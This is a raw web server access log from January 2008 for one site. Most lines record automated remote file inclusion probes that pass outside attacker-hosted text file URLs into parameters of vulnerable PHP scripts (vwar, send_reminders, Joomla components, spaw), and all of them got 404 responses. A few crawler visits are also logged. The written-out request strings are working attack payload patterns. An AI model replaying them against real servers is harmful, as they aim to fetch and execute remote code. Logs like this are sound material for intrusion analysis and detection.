81.177.13.130 - - [03/Jan/2008:13:48:54 -0800] "GET /logs/convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.13.130 - - [03/Jan/2008:13:49:16 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.13.130 - - [03/Jan/2008:13:49:17 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.13.130 - - [03/Jan/2008:13:49:18 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.13.130 - - [03/Jan/2008:13:50:16 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.13.130 - - [03/Jan/2008:13:50:17 -0800] "GET /convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.13.130 - - [03/Jan/2008:13:50:17 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.13.130 - - [03/Jan/2008:13:51:29 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.70 - - [03/Jan/2008:13:52:49 -0800] "GET /logs/access_071128.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.97.20.22 - - [03/Jan/2008:13:52:55 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [03/Jan/2008:13:52:56 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [03/Jan/2008:13:52:56 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.61.185.205 - - [03/Jan/2008:13:55:05 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.61.185.205 - - [03/Jan/2008:13:55:18 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.13.130 - - [03/Jan/2008:13:56:59 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.13.130 - - [03/Jan/2008:13:57:09 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.239.161.132 - - [03/Jan/2008:14:01:56 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.132 - - [03/Jan/2008:14:01:57 -0800] "GET /convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.132 - - [03/Jan/2008:14:01:58 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.132 - - [03/Jan/2008:14:03:08 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.132 - - [03/Jan/2008:14:03:09 -0800] "GET /convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.132 - - [03/Jan/2008:14:03:10 -0800] "GET /logs/convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.97.20.22 - - [03/Jan/2008:14:06:02 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [03/Jan/2008:14:06:02 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [03/Jan/2008:14:06:02 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:06:47 -0800] "GET /config.php?path_to_root=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:06:47 -0800] "GET /logs/config.php?path_to_root=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:07:15 -0800] "GET /beacon/language/1/splash.lang.php?languagePath=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:07:16 -0800] "GET /logs/beacon/language/1/splash.lang.php?languagePath=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.239.161.132 - - [03/Jan/2008:14:08:12 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.132 - - [03/Jan/2008:14:08:41 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.0.141.110 - - [03/Jan/2008:14:08:58 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [03/Jan/2008:14:08:58 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [03/Jan/2008:14:08:58 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:12:05 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:12:05 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:15:40 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:15:40 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:23:49 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:23:50 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:23:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:23:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:14:27:16 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:14:27:16 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:14:27:16 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.92.82 - - [03/Jan/2008:14:27:23 -0800] "GET /logs/access_071221.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.92.82 - - [03/Jan/2008:14:27:23 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.92.82 - - [03/Jan/2008:14:27:25 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.99.64 - - [03/Jan/2008:14:28:18 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [03/Jan/2008:14:28:18 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [03/Jan/2008:14:28:18 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.92.82 - - [03/Jan/2008:14:28:34 -0800] "GET /logs/access_071219.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:14:29:52 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:14:29:53 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.200.79.215 - - [03/Jan/2008:14:32:42 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.79.215 - - [03/Jan/2008:14:32:42 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.79.215 - - [03/Jan/2008:14:32:42 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.129.89.71 - - [03/Jan/2008:14:34:16 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.129.89.71 - - [03/Jan/2008:14:34:16 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.129.89.71 - - [03/Jan/2008:14:34:16 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:34:34 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:34:38 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:14:38:06 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:14:38:06 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:14:38:06 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:14:38:43 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:14:38:43 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:14:38:43 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.196.254.164 - - [03/Jan/2008:14:40:50 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [03/Jan/2008:14:40:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [03/Jan/2008:14:40:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.62.34 - - [03/Jan/2008:14:40:52 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [03/Jan/2008:14:40:53 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [03/Jan/2008:14:40:53 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:40:56 -0800] "GET //modules/xfsection/modify.php?dir_module=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:40:56 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
210.245.120.9 - - [03/Jan/2008:14:42:47 -0800] "GET //admin.a6mambocredits.php?mosConfig_live_site=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
210.245.120.9 - - [03/Jan/2008:14:42:47 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
203.162.1.238 - - [03/Jan/2008:14:44:04 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
203.162.1.238 - - [03/Jan/2008:14:44:13 -0800] "GET //admin.a6mambocredits.php?mosConfig_live_site=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:14:45:29 -0800] "GET /logs/access_071221.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:14:45:30 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:14:45:30 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:14:46:09 -0800] "GET /logs/access_071221.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:14:46:09 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:14:46:09 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:14:46:29 -0800] "GET /logs/access_071219.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:14:46:59 -0800] "GET /logs/access_071219.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.126 - - [03/Jan/2008:14:47:06 -0800] "GET /megumi/?N=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
148.243.232.112 - - [03/Jan/2008:14:52:01 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.243.232.112 - - [03/Jan/2008:14:52:01 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.243.232.112 - - [03/Jan/2008:14:52:02 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.24.124 - - [03/Jan/2008:14:54:22 -0800] "GET /megumi/Necklace/?S=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:55:38 -0800] "GET //jscript.php?my_ms[root]=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:14:55:38 -0800] "GET /logs//jscript.php?my_ms[root]=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
80.237.144.235 - - [03/Jan/2008:14:56:14 -0800] "GET /images/evil.php?owned=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
80.237.144.235 - - [03/Jan/2008:14:56:14 -0800] "GET /logs/images/evil.php?owned=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
65.55.213.32 - - [03/Jan/2008:14:56:47 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.32 - - [03/Jan/2008:14:56:47 -0800] "GET /megumi/Necklace/?D=A HTTP/1.0" 200 4307 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.32 - - [03/Jan/2008:14:56:48 -0800] "GET /megumi/Necklace/?N=A HTTP/1.0" 200 4307 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
64.34.145.199 - - [03/Jan/2008:14:59:29 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.199 - - [03/Jan/2008:14:59:30 -0800] "GET / HTTP/1.0" 200 2946 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
128.121.21.39 - - [03/Jan/2008:14:59:46 -0800] "GET /logs/modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
